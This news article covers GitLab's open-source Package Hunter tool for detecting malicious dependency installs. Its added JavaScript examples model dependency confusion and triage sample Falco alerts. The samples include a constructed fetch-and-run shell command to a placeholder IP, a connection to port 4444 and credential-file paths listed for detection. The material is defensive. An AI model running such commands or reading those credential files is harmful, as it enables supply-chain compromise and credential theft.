GitLab has open-sourced Package Hunter, a tool that lets developers and security teams detect malicious code in application dependencies. It analyzes dependencies for malicious code as well as other unexpected behavior.

It installs the dependencies in a sandbox environment, monitors what they do while they install, and reports any suspicious behavior to the developer, who can then examine it further.

According to GitLab, a recent review of open source software supply chain attacks found that malicious dependencies are common, and that the methods for delivering them have become increasingly sophisticated.

For example, earlier this year security researchers described a technique dubbed Dependency Confusion that abuses the way many popular package managers resolve package names when more than one registry is in play: by publishing a package on a public registry under the same name as an organization's internal package (typically with a higher version number), an attacker can trick the package manager into installing the dependency from a location the attacker controls instead of the trusted registry. The attacker's package can then execute code that compromises production systems or CI environments, GitLab explained.
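As an added illustration (not GitLab's or Package Hunter's code), the following JavaScript models the resolution flaw behind dependency confusion beside one way to close it. The registry URLs, the package names (`acme-internal-utils`, `acme-logger`), the versions and the `acme-` naming convention are all constructed for the example; real package managers differ in detail, but the "highest version across all configured sources wins" behaviour shown is the one the attack relies on.

```javascript
// Added example (not Package Hunter code): a simplified model of dependency confusion.
// Registry URLs, package names and versions below are constructed for illustration.
const PRIVATE_REGISTRY = "https://npm.internal.example/"; // assumed private registry
const PUBLIC_REGISTRY = "https://registry.npmjs.org/";

// Constructed registry indexes: registry -> package name -> published versions.
// The attacker has published "acme-internal-utils" publicly with an absurdly high version.
const REGISTRIES = {
  [PRIVATE_REGISTRY]: {
    "acme-internal-utils": ["1.1.0", "1.2.0"],
    "acme-logger": ["0.3.1"],
  },
  [PUBLIC_REGISTRY]: {
    "acme-internal-utils": ["99.0.0"], // attacker-controlled
    "lodash": ["4.17.21"],
  },
};

// Numeric major.minor.patch comparison; pre-release tags are out of scope here.
function compareSemver(a, b) {
  const pa = a.split(".").map(Number);
  const pb = b.split(".").map(Number);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] ?? 0) - (pb[i] ?? 0);
    if (d !== 0) return d;
  }
  return 0;
}

// Vulnerable resolution: ask every configured registry and take the highest version,
// regardless of where it came from. This is the behaviour dependency confusion abuses.
function resolveHighestAcrossRegistries(name, registryUrls) {
  let best = null;
  for (const url of registryUrls) {
    for (const version of REGISTRIES[url]?.[name] ?? []) {
      if (best === null || compareSemver(version, best.version) > 0) {
        best = { version, registry: url };
      }
    }
  }
  return best;
}

// Hardened resolution: the package name alone decides which registry is consulted.
// Internal names go only to the private registry, everything else only to the public one,
// and a missing internal package is an error rather than a fallback to the public registry.
function resolvePinned(name, policy) {
  const registry = policy.internalPattern.test(name)
    ? policy.privateRegistry
    : policy.publicRegistry;
  const versions = REGISTRIES[registry]?.[name] ?? [];
  if (versions.length === 0) {
    throw new Error(`${name} not found in ${registry}; refusing to fall back to another registry`);
  }
  const version = versions.reduce((a, b) => (compareSemver(a, b) >= 0 ? a : b));
  return { version, registry };
}

// Assumed policy: internal packages follow an "acme-" naming convention.
const POLICY = {
  internalPattern: /^acme-/,
  privateRegistry: PRIVATE_REGISTRY,
  publicRegistry: PUBLIC_REGISTRY,
};

// Stand-alone demo: the vulnerable resolver picks the attacker's 99.0.0 from the public
// registry; the pinned resolver returns 1.2.0 from the private registry.
console.log(resolveHighestAcrossRegistries("acme-internal-utils", [PRIVATE_REGISTRY, PUBLIC_REGISTRY]));
console.log(resolvePinned("acme-internal-utils", POLICY));
```

For npm, the pinned policy corresponds to a scoped registry entry in `.npmrc` (for example `@acme:registry=https://npm.internal.example/`) combined with claiming that scope on the public registry so nobody else can; the point the example makes is that the fix is a routing rule keyed on the name, never a version comparison.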

Further complicating matters, most existing dependency scanners only identify dependencies with known vulnerabilities and do not detect whether a dependency actually executes malicious code, for instance from an install-time script. The company hopes Package Hunter will fill this gap.

Package Hunter uses Falco, the open source runtime security tool, to monitor the system calls a dependency makes while it installs in the sandbox, and it currently supports testing Node.js modules and Ruby gems.
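The behavioral side of this, as an added example rather than Package Hunter's own code: with `json_output` enabled, Falco emits one JSON object per alert, so a sandbox harness can collect the alerts raised during an install and decide what to report to the developer. The events below are constructed to mimic that shape for a hypothetical package `left-pad-evil`; the Falco field names used (`evt.type`, `proc.name`, `proc.pname`, `proc.cmdline`, `fd.name`, `fd.rip`, `fd.rip.name`, `fd.rport`, `evt.is_open_write`) are real, while the rule names, hosts, paths, allow-lists and severities are assumptions.

```javascript
// Added example (not Package Hunter code): triage of Falco alerts captured while a
// dependency installs inside a sandbox. Everything below the field names is constructed.
const INSTALL_DIR = "/sandbox/node_modules"; // assumed sandbox install prefix
const ALLOWED_HOSTS = new Set(["registry.npmjs.org", "rubygems.org"]); // assumed registries
const SENSITIVE_PATHS = ["/.npmrc", "/.gem/credentials", "/.ssh/", "/.aws/", "/.docker/config.json"];
const SHELLS = new Set(["sh", "bash", "dash", "zsh"]);

// Constructed Falco json_output lines for an install of the hypothetical "left-pad-evil".
const FALCO_LINES = [
  { rule: "Net connect", priority: "Notice", output_fields: { "evt.type": "connect", "proc.name": "node", "proc.pname": "npm", "fd.rip.name": "registry.npmjs.org", "fd.rip": "104.16.0.35", "fd.rport": 443 } },
  { rule: "File open", priority: "Notice", output_fields: { "evt.type": "openat", "evt.is_open_write": true, "proc.name": "node", "proc.pname": "npm", "fd.name": "/sandbox/node_modules/left-pad-evil/index.js" } },
  { rule: "File open", priority: "Notice", output_fields: { "evt.type": "openat", "evt.is_open_write": false, "proc.name": "node", "proc.pname": "npm", "fd.name": "/root/.npmrc" } },
  { rule: "Process spawn", priority: "Notice", output_fields: { "evt.type": "execve", "proc.name": "sh", "proc.pname": "node", "proc.cmdline": "sh -c curl http://203.0.113.7/p.sh | sh" } },
  { rule: "Net connect", priority: "Notice", output_fields: { "evt.type": "connect", "proc.name": "curl", "proc.pname": "sh", "fd.rip.name": "", "fd.rip": "203.0.113.7", "fd.rport": 4444 } },
  { rule: "File open", priority: "Notice", output_fields: { "evt.type": "openat", "evt.is_open_write": true, "proc.name": "sh", "proc.pname": "node", "fd.name": "/etc/cron.d/left-pad-evil" } },
].map((event) => JSON.stringify(event));

// Classify each alert against what a package install is expected to do. Registry traffic and
// writes under the install prefix are normal; everything else becomes a finding.
function triageFalcoEvents(lines) {
  const findings = [];
  for (const line of lines) {
    const f = JSON.parse(line).output_fields;
    const who = `${f["proc.pname"]} -> ${f["proc.name"]}`;
    switch (f["evt.type"]) {
      case "connect": {
        const host = f["fd.rip.name"] || f["fd.rip"]; // fall back to the raw IP
        if (!ALLOWED_HOSTS.has(host)) {
          findings.push({ severity: "high", category: "unexpected-network", detail: `${who} connected to ${host}:${f["fd.rport"]}` });
        }
        break;
      }
      case "openat": {
        const path = f["fd.name"] ?? "";
        if (SENSITIVE_PATHS.some((p) => path.includes(p))) {
          findings.push({ severity: "high", category: "credential-access", detail: `${who} opened ${path}` });
        } else if (f["evt.is_open_write"] && !path.startsWith(INSTALL_DIR + "/")) {
          findings.push({ severity: "medium", category: "write-outside-install-dir", detail: `${who} wrote ${path}` });
        }
        break;
      }
      case "execve": {
        if (SHELLS.has(f["proc.name"])) {
          findings.push({ severity: "medium", category: "shell-spawn", detail: `${who}: ${f["proc.cmdline"]}` });
        }
        break;
      }
    }
  }
  const rank = { high: 0, medium: 1, low: 2 };
  return findings.sort((a, b) => rank[a.severity] - rank[b.severity]);
}

// Overall verdict for the package: "block" on any high finding, "review" on medium, else "pass".
function verdict(findings) {
  if (findings.some((x) => x.severity === "high")) return "block";
  if (findings.some((x) => x.severity === "medium")) return "review";
  return "pass";
}

// Stand-alone demo: four findings, verdict "block".
const report = triageFalcoEvents(FALCO_LINES);
console.log(verdict(report), report);
```

The allow-lists carry the real work: a raw syscall trace of an install is noisy (npm legitimately connects to the registry and writes thousands of files), so the triage has to encode what the package manager is expected to do and flag only departures from it: credential reads, network destinations other than the registry, shells spawned by the interpreter, and writes outside the install prefix.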

GitLab has been using Package Hunter internally since November 2020 to test its own dependencies. “By making it publicly available, we hope to enable other projects to detect malicious code in their dependencies before it causes any harm and also to increase the general confidence in open source supply chains. Package Hunter is free and open source,” Dennis Appelt, staff security researcher at GitLab, wrote in a post.